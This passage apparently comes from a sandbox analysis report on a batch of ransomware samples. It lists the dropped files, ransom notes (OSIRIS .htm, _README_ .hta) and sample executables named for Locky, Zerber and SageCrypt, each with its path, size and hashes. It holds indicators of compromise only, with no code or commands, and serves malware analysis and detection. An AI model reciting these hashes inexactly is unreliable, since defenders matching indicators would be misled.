                                                                                                      68KB

                                                                                                      MD5

                                                                                                      e3386c35a64e28432e62957b0a248bff

                                                                                                      SHA1

                                                                                                      0af8d5da3044b0c148b4e9e73ddba555f1668040

                                                                                                      SHA256

                                                                                                      b470509c1ff9ec6472546fb65e42a1a0e59dde3737c35af61f633c24560a30e5

                                                                                                      SHA512

                                                                                                      de8aa7a646e04d1af12046cc4b808e40c4cd97f875c20e4050023a4e2186ae9fb173f6896dbe7df02b935075040593f28ca5525a8c0b12a2d6fdfc69a71f82bc

                                                                                                    • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+gjhcp.txt

                                                                                                      Filesize

                                                                                                      2KB

                                                                                                      MD5

                                                                                                      841d009145d5e0a36ed9381a291f5508

                                                                                                      SHA1

                                                                                                      11333868a8161493a4dee588a198c0ce6e653987

                                                                                                      SHA256

                                                                                                      cc7f1d7cd8d0003e93116c95093e93872e891403bbe036f7f097de7ef0ee32f6

                                                                                                      SHA512

                                                                                                      5ef11e479d3d34101704523f95babe443b4e81a6cb131a846ea5de449000725f926428dbe04c603bbc4ca69023ee6c02ffc70d50488028c9de910890c114755a

                                                                                                    • C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\OSIRIS-f734.htm

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                      MD5

                                                                                                      2056a84af594c47d605dc0060834518a

                                                                                                      SHA1

                                                                                                      aad6abccb4642d528562eba79c5ff192d74824cd

                                                                                                      SHA256

                                                                                                      6f93df626cba454bc18e7568cb44f05518abb0ae95467e637f45c6b224a34472

                                                                                                      SHA512

                                                                                                      936f1c62080d4a10a9a1f6ff2855f6204f80474eaf78aad016492c1e3b148f78e2d80703fd832f62df765d227840dce3f51e3d6d96e71cbc040fbe3b53fabed3

                                                                                                    • C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\_README_M1HBRSC_.hta

                                                                                                      Filesize

                                                                                                      66KB

                                                                                                      MD5

                                                                                                      588f4730b4a1c551cde28d617eeff3d3

                                                                                                      SHA1

                                                                                                      fbf16f7952f905e8c650c6d7089952428b4d8ac4

                                                                                                      SHA256

                                                                                                      438e78e8ffa952df8b9feed3cf32a2cecb282a5fa394a211665a0506966198e2

                                                                                                      SHA512

                                                                                                      9acd46d0ab822b2a01b0bc6ae85487f4601fd5a1a5e3cb35ee318ab6e3f406482994e0b3f4103cae19a0ae297ae2193087de499c51fd4e58d407b620d163fb1c

                                                                                                    • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

                                                                                                      Filesize

                                                                                                      11KB

                                                                                                      MD5

                                                                                                      a31e6930f23c56a55975bde5279ac533

                                                                                                      SHA1

                                                                                                      f6ce2335faeabe59fb195f92449ff578854e0a69

                                                                                                      SHA256

                                                                                                      62b3d85c0c79c05163cd5582e341d07768a0f459206f427c1c5cfe0c3cec2d5d

                                                                                                      SHA512

                                                                                                      ff7c2611edcd809546f8f0ff9c08084ac0d8c780d9b00d2341cc18b711338dc4629ece76f7284a652f370a11de2aa768a4c2bb518eeb7c6066ee199307b1c186

                                                                                                    • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

                                                                                                      Filesize

                                                                                                      109KB

                                                                                                      MD5

                                                                                                      7d2e9f38ddb145e62417819882825b9c

                                                                                                      SHA1

                                                                                                      96d41f3ec88c40c27996d1a7283d068ceac71bdf

                                                                                                      SHA256

                                                                                                      be0aca12be17eb0b70fa710c3ab35130a32b4aeb3ec2516af8abe25ad66ec415

                                                                                                      SHA512

                                                                                                      63b6a13197ece591681a1d8b4ba615cae52faa6f828d3a7ab87b604b373e37209d090eec4102ea06fc2cb510190733f64dce6d5daa58ef855dc08af1bdb546be

                                                                                                    • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt

                                                                                                      Filesize

                                                                                                      173KB

                                                                                                      MD5

                                                                                                      ef56f656d69b009f880b0d85503f4771

                                                                                                      SHA1

                                                                                                      c63a3ce1f690c90f773b515e4d812f2078efea93

                                                                                                      SHA256

                                                                                                      c54ac997a1bb91f4d2966ee862bc815ec1c03184a39dc8e7757fb7c0cf0a6538

                                                                                                      SHA512

                                                                                                      b2982630447db08c605fd0deb5698ff932ba6d8b0a065fdcca6bf50540d07278560c68f7c88f26a76e04e3557b5c3df56c08c060b297b4ae908c54596ae40557

                                                                                                    • C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\OSIRIS-1672.htm

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                      MD5

                                                                                                      1fe5b0eef69b9cd02bfa6da0aff1e33f

                                                                                                      SHA1

                                                                                                      ef25ecf7f2d341132d9bf8d7d49b3812f26ff5b6

                                                                                                      SHA256

                                                                                                      c14d731f10ac0d06be1ecbb65995f2d07af10b1e18111fc8bb746cc3f4350d25

                                                                                                      SHA512

                                                                                                      0058d3ba27f89a598a41d829ac7720a86c490559604928dad5944460c1c9bcaf4af02b84d043cb7b0e8f43b6ccda6f5fcf4d5b080b7be927e307b49630d16e0a

                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                      Filesize

                                                                                                      342B

                                                                                                      MD5

                                                                                                      174e361f16d54a93a0b752f60e06ecf6

                                                                                                      SHA1

                                                                                                      6e0ad1dbd97fe6521504ccbd890061d70f4c0d34

                                                                                                      SHA256

                                                                                                      19bf1e04de987aea3ed44b10cfb957023a41534a053605266fc57a81c44a47d9

                                                                                                      SHA512

                                                                                                      6759d7cac812f98cdaeec8cfd18163bcbf45494bd16aed581a483035bceb6d6063b7e4237dfe8aa23623a06d577106ed30352b610423e5e9334b439d90c8379f

                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                      Filesize

                                                                                                      342B

                                                                                                      MD5

                                                                                                      367fe88b27016f942b192ae37d5135b6

                                                                                                      SHA1

                                                                                                      0b562600642f1eed45d8f855decec310a69b2510

                                                                                                      SHA256

                                                                                                      0ccf278b6083bb61e504787b520d94a3d9f08b9ef914d9f70a99768d7fd50073

                                                                                                      SHA512

                                                                                                      660ff2c1b76b359951c9a4413f2a12fec89c3a59ba61d86a481829175ceb34fdfdc702d39b71f011a0eb1628e89f75f37db5330d83d2b024a7f35ad61c0c0843

                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                      Filesize

                                                                                                      342B

                                                                                                      MD5

                                                                                                      a5024e85b285f66cb32e1ae82e757d09

                                                                                                      SHA1

                                                                                                      39af31017003bce358e7e05bfee1128fa30413ac

                                                                                                      SHA256

                                                                                                      b64e9f640a242bbb458fa3fcd2e1696afe22cbcae9dc3a36b583a881d5794774

                                                                                                      SHA512

                                                                                                      5a7dbf781fba451f3bd643c40fcf21e0e95889617b9156066c88afd93669c00601c5763e8214d970607f709c37d26641d380cada7ca5e0aa2f646d900c858cfd

                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                      Filesize

                                                                                                      342B

                                                                                                      MD5

                                                                                                      2487a1452c9a66bfe1c2fd2aab7c7fec

                                                                                                      SHA1

                                                                                                      24df922c6f7d258904a11f272fc70b006bbf8078

                                                                                                      SHA256

                                                                                                      72e37d9c9fb0139db8ca4f623ac6da86001d504194f5613632e8679dac3edfbe

                                                                                                      SHA512

                                                                                                      bab6b2f4a937921b9550566ee3acd4147ca0e2e312124796d21053cbd9a812e12e007368efad241438e14178801baad901839d3f2506b713cd22b4c3860c61c2

                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                      Filesize

                                                                                                      342B

                                                                                                      MD5

                                                                                                      0d227bd28c453871117e885b77f2c6ae

                                                                                                      SHA1

                                                                                                      a61fb1679e57498a22d51b59202716a5ddce11ab

                                                                                                      SHA256

                                                                                                      90d9e43636f0f63ffbe848ee9d285ba287031214423ebd66f6f20d21283e8ed5

                                                                                                      SHA512

                                                                                                      a0db0bf4be0ebeaedb5c7a227be46e7626984d5cc77e84f93cc758c4e7c54c6e668bef5414ff9c45f556223899f4e0ea2581fa0d4ea072c77b0175f4fda4cde6

                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                      Filesize

                                                                                                      342B

                                                                                                      MD5

                                                                                                      8eb77902b47aae8d8ddac3363313a3df

                                                                                                      SHA1

                                                                                                      a40a2c00eeb8fc40678a4712785721c285bc5461

                                                                                                      SHA256

                                                                                                      2975f5c900afb603f900ad79773721cc2c8b12089812368136eff8051f73a4d2

                                                                                                      SHA512

                                                                                                      f3259d2869dae38743387c4db7acc5ff6c02dd3fdcf256528dc000e6aa45d35579753eb3fe901b2bc4c06b7a39257c9d7a769d587b285c5a9d40c73ea822bd10

                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                      Filesize

                                                                                                      342B

                                                                                                      MD5

                                                                                                      9bae2d0b3d890c8c4101e090779841e6

                                                                                                      SHA1

                                                                                                      c3164e5eeb4f5f9946a225461ef8d5cbe5ec863c

                                                                                                      SHA256

                                                                                                      56410f3eab2e58fc920155dcde716428a29eb8ea7e012014add2859e4488739f

                                                                                                      SHA512

                                                                                                      4172cf04178324b1bd2caebe7d64ad6b9a2c2d0cfb336e16f6717bd0119197db93c257f86a540376b3a6ac77c5829a882e8cff9e89949e76dfbdae5c6173b4fd

                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                      Filesize

                                                                                                      342B

                                                                                                      MD5

                                                                                                      06ef725f8c3a2df20a537136c1af4a8c

                                                                                                      SHA1

                                                                                                      e72d04468e18b2c67bd9c801692f0bdad73840f4

                                                                                                      SHA256

                                                                                                      7c0a0615cda3cf993eee444e544beb4086a2a0ba38ca25830971d009a2110779

                                                                                                      SHA512

                                                                                                      59319fa8c3be58cd089fa583ee30985e329b46c189f24cc01c2676655441c4182372ee1054bebba9c3b8e25e7dbb065bf72103829299a39fcb35aebbdc0e86b2

                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                      Filesize

                                                                                                      342B

                                                                                                      MD5

                                                                                                      467bc959c8c91eb5dc87fbabd2b8e08c

                                                                                                      SHA1

                                                                                                      e27633f0b65b36241545a9cbe1faabab6c5fffac

                                                                                                      SHA256

                                                                                                      2d635ffecc8cbe1a5f105ebcc8579784eefc78fa5703dea9ea17203408986e6a

                                                                                                      SHA512

                                                                                                      566d91b3f09af4d014d15df2858a20989f3b08cc5ea24a1954a11e87cfd204dfbaf982f13a6e7caa899655b6f1e115a0107744962d34bf25b244b427b116ee3d

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9d81b961\0275.tmp

                                                                                                      Filesize

                                                                                                      134B

                                                                                                      MD5

                                                                                                      b965058d918c9415b9164888bcce5937

                                                                                                      SHA1

                                                                                                      d6a80548e6a6f8fc8d071193085f300bb965bbd4

                                                                                                      SHA256

                                                                                                      2c6f59ddd3ba5b1f0e4942d443b8eb721dc029b28d7d90600e9a34cfdf1a8a77

                                                                                                      SHA512

                                                                                                      3e1b7376180d2588c745e2ec8431c904782a98dd9df7c224bbd0c7da63180a4471eb3a3080252694605eb3db06a4e0757ec1d328fad2b77194125b4a4914dc83

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9d81b961\4281.tmp

                                                                                                      Filesize

                                                                                                      344B

                                                                                                      MD5

                                                                                                      fd3ecd3c98fa11c68e58891f7b71164a

                                                                                                      SHA1

                                                                                                      e2ad937e10ad6660c97b2f83a9ebb6480fefe9c5

                                                                                                      SHA256

                                                                                                      f27cf73dbec52b3d23ecc598ca7a87ae2d74b274f343b8d2579b7eb042a8c767

                                                                                                      SHA512

                                                                                                      6e308775686064b585e331f297584c28caf11cc7dc68ac348eaf8ea64863a16de4ee4dcdc8edf885617985516ad0df4bf836f34442460982fd4043f1439e7879

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CabCA63.tmp

                                                                                                      Filesize

                                                                                                      70KB

                                                                                                      MD5

                                                                                                      49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                      SHA1

                                                                                                      1723be06719828dda65ad804298d0431f6aff976

                                                                                                      SHA256

                                                                                                      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                      SHA512

                                                                                                      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E792\73C9.bat

                                                                                                      Filesize

                                                                                                      112B

                                                                                                      MD5

                                                                                                      a313450e9cf796e6d5c81c670c5a534a

                                                                                                      SHA1

                                                                                                      a6252515502cba5ac335570422d5fe519b41670f

                                                                                                      SHA256

                                                                                                      83d72d80c9950a4f89d26ffbf0e0a0a421de9d336f3d865795474378d499933e

                                                                                                      SHA512

                                                                                                      dc45e993bb7234e20fac59e5db5639d39c6c474223ed404be57c64285d5b08b21559ce889cbe8d501afd08be9048fcfbd3b588827a7b2cb76133567a9d1c3cdb

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\TarCAA4.tmp

                                                                                                      Filesize

                                                                                                      181KB

                                                                                                      MD5

                                                                                                      4ea6026cf93ec6338144661bf1202cd1

                                                                                                      SHA1

                                                                                                      a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                                                      SHA256

                                                                                                      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                                                      SHA512

                                                                                                      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\~DFA5489C38FAB43AAC.TMP

                                                                                                      Filesize

                                                                                                      20KB

                                                                                                      MD5

                                                                                                      4877e7c2aad54b55f86bd4718b0ca647

                                                                                                      SHA1

                                                                                                      f575e17c1fa722ca91038c319a36cb5238546e2f

                                                                                                      SHA256

                                                                                                      eca0abc83c8fdf47801dfc065333b87f44ea522734e2bd1c0859be99e15731a2

                                                                                                      SHA512

                                                                                                      33f1e018320e4f13d2ee8798f72fbbc3011a96543ebf2b3360c0314544c713eab8310d026410ccc9694357cbaf234114c02165d5aaf490c2dd853730e7c2e88f

                                                                                                    • C:\Users\Admin\AppData\Roaming\cl\PYTHON27.DLL

                                                                                                      Filesize

                                                                                                      2.3MB

                                                                                                      MD5

                                                                                                      9d7f84a3795bacba4403c1e64f6bc932

                                                                                                      SHA1

                                                                                                      6a27015451a02957034834cee005c0de0ba7151e

                                                                                                      SHA256

                                                                                                      fe5e626e467226bd250717c66944950371f74cc83b60425644cd2e95616376de

                                                                                                      SHA512

                                                                                                      c723a6e977f5d02477d1c5999290c875fa5e18b60367c5d21131595ad8b082edba26b006c9d788a98aac9283857f3483c32cac2e332f9676041a87d255f59360

                                                                                                    • C:\Users\Admin\AppData\Roaming\cl\library.zip

                                                                                                      Filesize

                                                                                                      5.5MB

                                                                                                      MD5

                                                                                                      81a7391be622c872710333c51130aace

                                                                                                      SHA1

                                                                                                      437320225a7b79bdcc92250d8b447b26319c269d

                                                                                                      SHA256

                                                                                                      d6a3a6aa239d24d6cb7b29ad049583d8d36ac32fdac5cbf7b80b90a4010b190b

                                                                                                      SHA512

                                                                                                      785ee3faa718a1baf52ce095f7c63ce43a0357cc3c17333b5c03f399a5fa5daa5aa94f746a74f8475922ed108a9406104328c259733ac5e9adf0a4848fe7b800

                                                                                                    • C:\Users\Admin\AppData\Roaming\s1qoaKDO.tmp

                                                                                                      Filesize

                                                                                                      72B

                                                                                                      MD5

                                                                                                      afc8f8033ac6b33af6056941bbd7d4e6

                                                                                                      SHA1

                                                                                                      94f6f7fcb8dab3741d4b0082e9998d03406e13f2

                                                                                                      SHA256

                                                                                                      c76a0f81ff9a5441be942cf3ea2a2ac9a547f0ca7d2ec146d8b8fe92960afee1

                                                                                                      SHA512

                                                                                                      2cb0054843a7f3ac05bd827cd0ef767363fc7f5b859c6697d7c0b9005c66d518968bb221a6ccd9f863d11e032420a25b758f9d9bd3fc7a9d48323d196283a6f5

                                                                                                    • C:\Users\Admin\Desktop\00287\HEUR-Trojan-Ransom.Win32.Agent.gen-d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a.exe

                                                                                                      Filesize

                                                                                                      275KB

                                                                                                      MD5

                                                                                                      bc67c34fae42d4408d4223c537131c95

                                                                                                      SHA1

                                                                                                      27a6effafda93ba0c103e965fb925f92468e2623

                                                                                                      SHA256

                                                                                                      d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a

                                                                                                      SHA512

                                                                                                      f347803528c4f3c1f706f17af0901e31901ecc98dc27466e73d3657ea149c63993c9dc030d7cef901ed4d12b91e5c93fbc90ef91e2e609af4680fd3257a501d0

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Agent.iyi-96e0f2a803195e87752de63e91566dfe74b565d80e3c36efd90d85ec1b3be632.exe

                                                                                                      Filesize

                                                                                                      436KB

                                                                                                      MD5

                                                                                                      6c2c5d6659efb231d9ad581c9bc2a98e

                                                                                                      SHA1

                                                                                                      feab504fed043f6c76af14a090496b19fef75f44

                                                                                                      SHA256

                                                                                                      96e0f2a803195e87752de63e91566dfe74b565d80e3c36efd90d85ec1b3be632

                                                                                                      SHA512

                                                                                                      da89c4d71aa5251dd94e382488cc35ed23893c8c0fe7bf724108acde6775ed63db01f621337cc8c7f291c9b380769452f9558379ff391729f2dbe507747d9ace

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Bitman.jqn-a43d6f88a8a24c7ed5771344784001d79be32bac0b8f7b0e0640b1b44a5ec799.exe

                                                                                                      Filesize

                                                                                                      376KB

                                                                                                      MD5

                                                                                                      bc172f66b11dc350f3d638eafaccaf94

                                                                                                      SHA1

                                                                                                      d298d950b9694a6ebedb18bc526ce18bf46771e0

                                                                                                      SHA256

                                                                                                      a43d6f88a8a24c7ed5771344784001d79be32bac0b8f7b0e0640b1b44a5ec799

                                                                                                      SHA512

                                                                                                      15945320fa7a10eee2056245367d336532d286ca9b91757f3ff137cf7201b99364c2bcdaf91756e1b1c84648895f3fcc8292879797bdecd81f885d22af96e37e

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Blocker.jzey-7cf5cc09f9a8d5cc5cd1aa0ab400af4a08879adfcd09101c7ec89a1ce5904981.exe

                                                                                                      Filesize

                                                                                                      2.5MB

                                                                                                      MD5

                                                                                                      04cb2c74731abb54968271e7732ada14

                                                                                                      SHA1

                                                                                                      05ae76d02b8b63895e017b21bfc65bab321c5365

                                                                                                      SHA256

                                                                                                      7cf5cc09f9a8d5cc5cd1aa0ab400af4a08879adfcd09101c7ec89a1ce5904981

                                                                                                      SHA512

                                                                                                      b0e03331b2fafae7ab5fda5974ec1366a40ab62416f47b7326bf6050bc9484427c4ded2fa2f11aee12c646bb2d6f8478a27c0a993d9f3fa8535fd18c9588477e

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Foreign.njwr-d73edb11c1597d9dc64545f079c230911e5505489e68aa1575153430b273a18d.exe

                                                                                                      Filesize

                                                                                                      456KB

                                                                                                      MD5

                                                                                                      7754480cc3b682654a4f308a3e52e85e

                                                                                                      SHA1

                                                                                                      0d74e814ee7dbbc89bd1b7a9b89d2227ed3a0334

                                                                                                      SHA256

                                                                                                      d73edb11c1597d9dc64545f079c230911e5505489e68aa1575153430b273a18d

                                                                                                      SHA512

                                                                                                      ca63723516ed053f1e88a32f0141697435a468b27cacd2fa86af3ed2ef54cf4ed7e6ab65e5959a5f544a2536a34940aea77abfa3a34db80c0ae6a610ba47ac45

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Gen.hly-f241f35bb0f53a1baf0e5da26ef7bb86f3de83e94f3ccab04086b26f2f95dde5.exe

                                                                                                      Filesize

                                                                                                      5.4MB

                                                                                                      MD5

                                                                                                      2f03bf90f0b0ffbe9240782090aa9038

                                                                                                      SHA1

                                                                                                      e167787cada9ecb91c862704783152a989a761fd

                                                                                                      SHA256

                                                                                                      f241f35bb0f53a1baf0e5da26ef7bb86f3de83e94f3ccab04086b26f2f95dde5

                                                                                                      SHA512

                                                                                                      c0b4b9889e2b3b6aec1ac22b57b18acdc1486627930395f2368b584c0946d78aeb10814f6db497df8a65caf0b7b425b781f0def72475dcb392fb784a3ba16c85

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.bil-a1a050e249bcd548d2cf548244dfec407c00de568529c7e2a1ba78ebddd24515.exe

                                                                                                      Filesize

                                                                                                      244KB

                                                                                                      MD5

                                                                                                      70c9c793f610038b47209a650f38e24a

                                                                                                      SHA1

                                                                                                      ecb470b4b54798e88a34366b2b5a11dc93024cd2

                                                                                                      SHA256

                                                                                                      a1a050e249bcd548d2cf548244dfec407c00de568529c7e2a1ba78ebddd24515

                                                                                                      SHA512

                                                                                                      71732efd81b4a6c71ca604eb8d8ec1b94c51669f5eceafe7a6eacd7b0073f0dca401590451bd09f95ff36cba7d6699903c35a348677103ba3fff599478bda2d0

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.eq-7bcd80f4ba829652fcd4514585d00052ce8c8bdb48b3f7b651846de264bcba32.exe

                                                                                                      Filesize

                                                                                                      381KB

                                                                                                      MD5

                                                                                                      13174317a9acd10f244a6b87475c4866

                                                                                                      SHA1

                                                                                                      e25418fb175eeda2d30e8a8b981753bd8844f9b7

                                                                                                      SHA256

                                                                                                      7bcd80f4ba829652fcd4514585d00052ce8c8bdb48b3f7b651846de264bcba32

                                                                                                      SHA512

                                                                                                      05084d92b4ea6a033395cd9c2fc3009b8c885da0663b862bd7e4c3b2421cc38d73250820258ff3cfcb208ccbc5146f77a4d1d695683ade96c47dfb1a7bb65e53

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.xnr-2fd6e890d882a29f4cfadc123f8016e584a864aba3c1166dfc0fea4f37a66fd8.exe

                                                                                                      Filesize

                                                                                                      364KB

                                                                                                      MD5

                                                                                                      9533202d7c1075d12f1a900cf8c950c5

                                                                                                      SHA1

                                                                                                      cd23d34033b14515a084bc2b4870c11cacde0f15

                                                                                                      SHA256

                                                                                                      2fd6e890d882a29f4cfadc123f8016e584a864aba3c1166dfc0fea4f37a66fd8

                                                                                                      SHA512

                                                                                                      f76108c1014882ea2671cf91755645af6a33f835bae597ecab6d81b02b564501b1380142f5cb8b638ae6751845d930bce69696b13849be88b9676805894071c1

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.xpk-4c663be2abf9417d8160f68982f0d8b9907afdcc51838e72185a8f7738f99e51.exe

                                                                                                      Filesize

                                                                                                      330KB

                                                                                                      MD5

                                                                                                      305fb326b1906e92a4c31f5c64825cef

                                                                                                      SHA1

                                                                                                      f6948a54ebb7d5a9967e48522f7f427a15911ebb

                                                                                                      SHA256

                                                                                                      4c663be2abf9417d8160f68982f0d8b9907afdcc51838e72185a8f7738f99e51

                                                                                                      SHA512

                                                                                                      d1f7ccb092051292bfe84d94ffd78789e8fcf6ac910ad0321a5edbc07f187b06f38ab3bea2304f7e52d6e63dc05f09234f1da84df1aa0f0785b87e3474f4718b

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.yz-ca1d9a2a7aff6461cabb5579159e438efe56b672c41cba1c19e6a8a13ff26e22.exe

                                                                                                      Filesize

                                                                                                      147KB

                                                                                                      MD5

                                                                                                      3c6e23b27e50c34f1aa8d8435082420e

                                                                                                      SHA1

                                                                                                      3d54bf2610dc3fc93ec13c438a3a20a8b8d4e910

                                                                                                      SHA256

                                                                                                      ca1d9a2a7aff6461cabb5579159e438efe56b672c41cba1c19e6a8a13ff26e22

                                                                                                      SHA512

                                                                                                      0c9f6806866187f46b8d991c5a49b00a7dd6e2091057986b375493f2917d852025dad6a5a92f8a10885e3ad61869f69a92846cb38110633c93e12e088dcae27c

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Locky.zi-ed7f1ade710f30310204288d0d60cf41ff66eeb21f68dd985fedb3b5eb8048fc.exe

                                                                                                      Filesize

                                                                                                      150KB

                                                                                                      MD5

                                                                                                      8ef7010d7ab4a4b9baee1cbdcf0c4d82

                                                                                                      SHA1

                                                                                                      bff71613ed2255f7997a0ac60f626961c4b4e471

                                                                                                      SHA256

                                                                                                      ed7f1ade710f30310204288d0d60cf41ff66eeb21f68dd985fedb3b5eb8048fc

                                                                                                      SHA512

                                                                                                      62a2388b224e46d2ae8747a0998573414af2c0833b72ffde490820e10ba7493d415d50c4370de49dce2a938af451e6b8db7b8c9e9321be31ea0b599719e788de

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.SageCrypt.cxs-2986976f43ebeae04db023cc17d8c770c7891f2d9a49d17b2c206c1ac5374063.exe

                                                                                                      Filesize

                                                                                                      347KB

                                                                                                      MD5

                                                                                                      9651c1b81e4cc2568659f1820f8ec467

                                                                                                      SHA1

                                                                                                      2f156bd7b4341eb83b3e79409835fc605a45137c

                                                                                                      SHA256

                                                                                                      2986976f43ebeae04db023cc17d8c770c7891f2d9a49d17b2c206c1ac5374063

                                                                                                      SHA512

                                                                                                      88b7281f5cf6ba2aa8cbe100d830e3ce545f42fbfc7e0bcec24ef40eff18332e3f87275d54c3942488e3a41e033eba49ca81135b63a0547bb608c4ef21a88a07

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.dpqs-7fd9aab2ff1a73a7c2eba96c12b9e266f0e5ad4c84057dcaf887c73b1b3df6f6.exe

                                                                                                      Filesize

                                                                                                      396KB

                                                                                                      MD5

                                                                                                      0a0a7dd25b625ad69e67387c535ab29d

                                                                                                      SHA1

                                                                                                      4807daf523bb1827f9c02a50a620c48834adebbd

                                                                                                      SHA256

                                                                                                      7fd9aab2ff1a73a7c2eba96c12b9e266f0e5ad4c84057dcaf887c73b1b3df6f6

                                                                                                      SHA512

                                                                                                      84d0656650f92a9097616aea07de2cef2e7833185bef1a1223904d6f438956ebfed8227f2d4a00044b8d6ff7ae3e589199b6860c03fde9d868a6e66ea62bbab4

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.dstt-325ae5820e59f2ca5d1b5efd8c03ee3a39327aa15ca846847edc8b00dd50803d.exe

                                                                                                      Filesize

                                                                                                      463KB

                                                                                                      MD5

                                                                                                      13dc06f507f4065d2b4ec6aceb6be914

                                                                                                      SHA1

                                                                                                      499ab8632d6e65d7d8c1764bbf32ded1edc77caf

                                                                                                      SHA256

                                                                                                      325ae5820e59f2ca5d1b5efd8c03ee3a39327aa15ca846847edc8b00dd50803d

                                                                                                      SHA512

                                                                                                      01e8e470ccfb0512dc8d2ea09ced261a19cb6c34810eb898bd491829636e49c299aa0d827a32b969b7925cd44a5ce00401ac589a8dbcdfc4837cd42d950e6dba

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.tvl-a52b3e931777b7f749e7663007adc9bf1d6dc0064a0ffd2cf072a8adb53fd148.exe

                                                                                                      Filesize

                                                                                                      261KB

                                                                                                      MD5

                                                                                                      ea746109d644f4060bcb66144b4b2e34

                                                                                                      SHA1

                                                                                                      ca92f689246c09d3aa8f96c37ae6b93413826d02

                                                                                                      SHA256

                                                                                                      a52b3e931777b7f749e7663007adc9bf1d6dc0064a0ffd2cf072a8adb53fd148

                                                                                                      SHA512

                                                                                                      1ca229f75c1e2c7122cc8e138dbf85956e8b1b18fc920f98a831ed4026d26ad66859adf4be52d7eb7335b76bac330cd8b365b2ae5cd227c50939695f81b86152

                                                                                                    • C:\Users\Admin\Desktop\00287\Trojan-Ransom.Win32.Zerber.vcp-e66c9959bcc4ab913b89e9dabe392b785616f1b5f2039a5757f0dc5d30e76690.exe

                                                                                                      Filesize

                                                                                                      343KB

                                                                                                      MD5

                                                                                                      b5acd7114871b64c25d2eaadbce860f6

                                                                                                      SHA1

                                                                                                      64ec4e0fe4b6c6cabbe207167c56a5af97b51515

                                                                                                      SHA256

                                                                                                      e66c9959bcc4ab913b89e9dabe392b785616f1b5f2039a5757f0dc5d30e76690

                                                                                                      SHA512

                                                                                                      3ffb2ebda19f361cbb480e906267b9afb66c16aae83bdce35b980dfe4a1995da634f6eaf26c65952709b309ec0f9cb06b518ff5ba94738b3d96c0b516ddde468

                                                                                                    • C:\Users\Admin\Desktop\00287\UDS-Trojan-Ransom.Win32.Zerber.a-470d82dec3c67b3d319ac7774f4276de82a5c853c8c39bb626df0fe81d6a1859.exe

                                                                                                      Filesize

                                                                                                      286KB

                                                                                                      MD5

                                                                                                      83ed601d78668f82bdd449f82d9f51c5

                                                                                                      SHA1

                                                                                                      74993699cc19c60918c2ca7a6dfba78c48ce0eed

